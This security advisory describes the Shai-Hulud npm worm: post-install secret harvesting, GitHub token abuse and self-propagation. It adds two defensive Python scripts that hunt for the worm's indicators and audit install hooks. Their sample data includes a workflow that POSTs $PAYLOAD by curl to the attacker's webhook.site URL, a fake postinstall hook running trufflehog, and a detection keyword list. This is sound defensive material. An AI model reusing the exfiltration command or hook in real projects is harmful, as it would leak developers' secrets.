On September 15, 2025, malicious versions of multiple popular packages were published to npm with a post-install script that harvested sensitive developer assets and exfiltrated them to attacker-created public GitHub repositories named Shai-Hulud. Wiz Research assesses that this activity is a downstream result of GitHub tokens exfiltrated during the s1ngularity campaign of late August 2025. We are continuing to monitor the situation and add new detections as necessary.
Once a version of one of the malicious packages is installed, the included payload uses the TruffleHog secret scanning tool to identify secrets on the host, in addition to harvesting environment variables and, where available, cloud credentials exposed through the instance metadata service (IMDS). The script then validates the collected credentials and, if it finds working GitHub tokens, abuses them in multiple ways:
- It creates a public repository named Shai-Hulud containing a dump of the harvested secrets.
- It pushes a new GitHub Actions workflow to every repository the token can reach. This workflow exfiltrates each repository's secrets to https://webhook[.]site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7
- It migrates private organizational repositories to public personal repositories under the attacker-controlled user (private org/repo → public user/repo), with the description “Shai-Hulud Migration” and a -migration suffix added to the repository name.
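The three GitHub behaviours above are all observable from the outside, which makes them useful hunting indicators for anyone holding a possibly-exposed token. The script below is an added example, not tooling from Wiz Research, Socket or any project named on this page: it checks repository records shaped like GitHub REST API repository objects (name, full_name, private, description, owner.login, owner.type) and raw workflow file contents against the repo name, description, suffix and webhook endpoint described above. The sample repositories, owners and workflow files at the bottom are constructed so the example runs offline; fetching live data from the API is left to the caller.

```python
"""Hunt a GitHub account or organization for the Shai-Hulud indicators
listed above.

Added example, not tooling from Wiz Research, Socket or any named project.
It consumes records shaped like GitHub REST API repository objects plus raw
workflow file contents, so it runs offline against the constructed sample
data at the bottom.
"""

# Indicators taken from the description above. Comparisons are
# case-insensitive because the attacker controls the casing.
IOC_REPO_NAME = "shai-hulud"              # secret-dump repository name
IOC_DESCRIPTION = "shai-hulud migration"  # description on migrated repos
IOC_NAME_SUFFIX = "-migration"            # suffix on migrated repos
# The exfiltration endpoint, written defanged ("[.]") in the text. The real
# hostname is used here so a workflow file containing it is matched.
IOC_WEBHOOK = "https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7"


def check_repo(repo):
    """Return the list of indicators a repository record matches."""
    reasons = []
    name = (repo.get("name") or "").lower()
    desc = (repo.get("description") or "").lower()
    owner = repo.get("owner") or {}
    if name == IOC_REPO_NAME:
        reasons.append("repository named Shai-Hulud (secret dump)")
    if desc == IOC_DESCRIPTION:
        reasons.append("description 'Shai-Hulud Migration'")
    # Migrated repos surface as *public* repositories under a *user* account
    # with a -migration suffix. A private org repo with the same suffix is an
    # ordinary name (think "db-migration"), so it is not flagged on its own.
    if (name.endswith(IOC_NAME_SUFFIX)
            and not repo.get("private", True)
            and owner.get("type") == "User"):
        reasons.append("public user repo with -migration suffix")
    return reasons


def check_workflow(path, content):
    """Return a finding if a GitHub Actions workflow references the endpoint.

    Any webhook.site reference in a workflow is reported; the exact
    Shai-Hulud URL is called out separately.
    """
    text = content.lower()
    if IOC_WEBHOOK in text:
        return f"{path}: contains the Shai-Hulud exfiltration URL"
    if "webhook.site" in text:
        return f"{path}: sends data to webhook.site"
    return None


def hunt(repos, workflows):
    """repos: list of repo records; workflows: {path: file text}.

    Returns [(subject, reason)] for every indicator hit.
    """
    findings = []
    for repo in repos:
        for reason in check_repo(repo):
            findings.append((repo["full_name"], reason))
    for path, content in workflows.items():
        finding = check_workflow(path, content)
        if finding:
            findings.append((path, finding))
    return findings


# Constructed sample data (not real accounts, repositories or workflows).
SAMPLE_REPOS = [
    {"full_name": "example-dev/Shai-Hulud", "name": "Shai-Hulud", "private": False,
     "description": "Shai-Hulud", "owner": {"login": "example-dev", "type": "User"}},
    {"full_name": "example-dev/billing-service-migration",
     "name": "billing-service-migration", "private": False,
     "description": "Shai-Hulud Migration",
     "owner": {"login": "example-dev", "type": "User"}},
    {"full_name": "example-org/billing-service", "name": "billing-service",
     "private": True, "description": "Internal billing service",
     "owner": {"login": "example-org", "type": "Organization"}},
    {"full_name": "example-org/db-migration", "name": "db-migration",
     "private": True, "description": "Schema migrations",
     "owner": {"login": "example-org", "type": "Organization"}},
]
SAMPLE_WORKFLOWS = {
    "example-org/billing-service/.github/workflows/ci.yml":
        "name: ci\non: push\njobs:\n  test:\n    runs-on: ubuntu-latest\n"
        "    steps:\n      - run: npm test\n",
    "example-org/billing-service/.github/workflows/exfil.yml":
        "name: exfil\non: push\njobs:\n  run:\n    runs-on: ubuntu-latest\n"
        "    steps:\n      - run: curl -s -X POST --data \"$PAYLOAD\" "
        "https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7\n",
}

if __name__ == "__main__":
    for subject, reason in hunt(SAMPLE_REPOS, SAMPLE_WORKFLOWS):
        print(f"{subject}: {reason}")
```

Against the constructed data this reports four hits: the Shai-Hulud dump repo, two for the migrated repo (description and public-user-with-suffix), and the workflow that posts to the webhook. The private `db-migration` repo under the organization is deliberately left alone, since the suffix alone is a weak signal; treat a hit on the description or the exact URL as confirmation that the token has been abused.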
This attack is a self-propagating worm. When the payload of a compromised package finds additional npm tokens in a victim environment, it automatically publishes malicious versions of every package those tokens can access. See Socket's initial analysis for further discussion of the malicious code.
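Both the initial compromise and the worm's spread depend on one thing: npm running a package's install-time script on the developer's or CI machine. The script below is an added example, not part of the Wiz write-up or of any package named on this page. It walks a node_modules tree, lists every package that declares a preinstall, install or postinstall hook, and flags hook commands that mention the TruffleHog scanner or the webhook.site endpoint described above. The sample tree, its package names and its hook commands are constructed in a temporary directory so the example runs offline.

```python
"""Inventory the npm lifecycle hooks that will run on `npm install`.

Added example; not part of the Wiz write-up or of any package named there.
The worm runs from a post-install script, so the question a developer can
answer locally is: which packages in this tree execute code at install
time, and what does that command invoke? The sample tree is constructed in
a temporary directory and the package names in it are made up.
"""
import json
import os
import tempfile

# Hooks npm runs for a dependency when it is installed from the registry.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Substrings taken from the description of the payload above.
SUSPICIOUS = ("trufflehog", "webhook.site")


def audit_install_hooks(node_modules):
    """Return [(package, hook, command, suspicious)] for every install hook found."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(node_modules):
        if "package.json" not in filenames:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: nothing to report
        scripts = manifest.get("scripts") or {}
        for hook in INSTALL_HOOKS:
            command = scripts.get(hook)
            if not command:
                continue
            suspicious = any(marker in command.lower() for marker in SUSPICIOUS)
            findings.append((manifest.get("name", dirpath), hook, command, suspicious))
    return findings


def build_sample_tree():
    """Write a constructed node_modules with benign and suspicious hooks."""
    node_modules = os.path.join(tempfile.mkdtemp(), "node_modules")
    manifests = {
        "plain-example": {"name": "plain-example", "version": "1.0.0"},
        "native-example": {"name": "native-example", "version": "2.3.1",
                           "scripts": {"install": "node-gyp rebuild"}},
        # Constructed: a hook that openly invokes the scanner named in the text.
        "worm-example": {"name": "worm-example", "version": "9.9.9",
                         "scripts": {"postinstall":
                                     "node setup.js && trufflehog filesystem . --json"}},
    }
    for directory, manifest in manifests.items():
        path = os.path.join(node_modules, directory)
        os.makedirs(path)
        with open(os.path.join(path, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return node_modules


if __name__ == "__main__":
    for name, hook, command, suspicious in audit_install_hooks(build_sample_tree()):
        marker = "SUSPICIOUS" if suspicious else "review"
        print(f"[{marker}] {name} {hook}: {command}")
```

The inventory tells you where to look, not whether the code is safe: a real payload normally hides behind an innocuous `node <file>.js`, so every hook in the list deserves a read of the file it launches. The stronger control is not to run dependency install scripts at all (`ignore-scripts=true` in `.npmrc`, or `npm ci --ignore-scripts`) and to allow-list the few native packages that genuinely need an install step.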
Based on victimology, Wiz Research assesses that this activity is tied to the recent s1ngularity / Nx supply chain attack, in which the initial theft of GitHub tokens enabled the broader chain of compromise and the publication of formerly private repositories. The initial npm packages that started this chain reaction included packages belonging to multiple maintainers already known to have been compromised in the s1ngularity attack.